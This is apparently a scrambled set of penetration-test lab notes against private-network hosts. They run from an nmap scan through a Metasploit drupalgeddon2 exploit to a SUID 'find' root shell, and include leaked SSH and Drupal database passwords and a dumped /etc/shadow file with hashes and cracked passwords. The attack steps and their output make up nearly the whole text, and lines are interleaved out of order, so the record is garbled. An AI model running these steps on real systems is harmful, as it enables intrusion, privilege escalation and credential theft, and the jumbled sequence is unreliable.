Wa0237. - 2025 01 11 22 59 250115141431
Wa0237. - 2025 01 11 22 59 250115141431
| ssh-hostkey:
PORT STATE SERVICE
| 3072 58:2d:1d:72:4c:72:b9:b5:a3:80:6b:74:d4:08:85:78 (RSA)
22/tcp open ssh
| 256 d1:f5:9f:6a:32:13:62:11:2b:8e:45:74:25:7e:a4:73 (ECDSA)
|_ 256 8c:de:40:e5:a7:6e:fe:43:ce:0c:a2:09:60:f5:5a:2f (ED25519)
192.168.100.67
Subtopic 2
use unix/webapp/drupal_drupalgeddon2
set lhost 192.168.100.5
root ! find . -exec /bin/sh -p \; -quit shell set rhosts 192.168.100.52
set targeturi /drupal/
run
linux
192.168.100.52
[22][ssh] host: 192.168.100.52 login: auditor password: qwertyuiop
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupal',
'username' => 'drupal',
'password' => 'syntex0421',
'host' => 'localhost',
'port' => '3306',
'driver' => 'mysql',
'prefix' => '',
),
),
);
cat /etc/shadow
root:$6$v8b2/P8T26uEUwvM$TBiao8o1dfqQrG
PPcebRj6A6cNiixcy6/r/AFtN5Swk7N1kpg/8UyQK
0pXFwdLfy5Ed/71VN91nJ6.3JyAN/00:18998:0:99
999:7:::
daemon:*:18960:0:99999:7:::
bin:*:18960:0:99999:7:::
sys:*:18960:0:99999:7:::
sync:*:18960:0:99999:7:::
games:*:18960:0:99999:7:::
man:*:18960:0:99999:7:::
lp:*:18960:0:99999:7:::
mail:*:18960:0:99999:7:::
news:*:18960:0:99999:7:::
uucp:*:18960:0:99999:7:::
proxy:*:18960:0:99999:7:::
www-data:*:18960:0:99999:7:::
backup:*:18960:0:99999:7:::
list:*:18960:0:99999:7:::
irc:*:18960:0:99999:7:::
gnats:*:18960:0:99999:7:::
nobody:*:18960:0:99999:7:::
systemd-network:*:18960:0:99999:7:::
systemd-resolve:*:18960:0:99999:7:::
systemd-timesync:*:18960:0:99999:7:::
messagebus:*:18960:0:99999:7:::
syslog:*:18960:0:99999:7:::
_apt:*:18960:0:99999:7:::
tss:*:18960:0:99999:7:::
root:sayang uuidd:*:18960:0:99999:7:::
tcpdump:*:18960:0:99999:7:::
auditor:qwertyuiop sshd:*:18960:0:99999:7:::
landscape:*:18960:0:99999:7:::
pollinate:*:18960:0:99999:7:::
ec2-instance-connect:!:18960:0:99999:7:::
systemd-coredump:!!:18998::::::
ubuntu:!:18998:0:99999:7:::
lxd:!:18998::::::
rtkit:*:18998:0:99999:7:::
xrdp:!:18998:0:99999:7:::
dnsmasq:*:18998:0:99999:7:::
usbmux:*:18998:0:99999:7:::
avahi:*:18998:0:99999:7:::
cups-pk-helper:*:18998:0:99999:7:::
pulse:*:18998:0:99999:7:::
geoclue:*:18998:0:99999:7:::
saned:*:18998:0:99999:7:::
colord:*:18998:0:99999:7:::
sddm:*:18998:0:99999:7:::
gdm:*:18998:0:99999:7:::
auditor:$6$RNJCCrE9ok/yCMqD$7uPoYFsrnR3w
PnSwPeLuBEiXgAzlOzGW6uZSyX.IjNNVcR5.bDB
hb.dlZTN37JJR4yZXXQTetuUhOOX9ZNov6/:190
99:0:99999:7:::
dbadmin:$6$1HAbXNNxXVVNCcoi$6Zy2gjvyZZ
YHTwSyxSLsdv0LA.5hA7EeD1WhUFzHg9SOSXrz
7DxX7iG0mCQbmEBSo.yjB1c80iIujSM6Fjbpo/:19
099:0:99999:7:::
mysql:!:19099:0:99999:7:::
ftp:*:19100:0:99999:7:::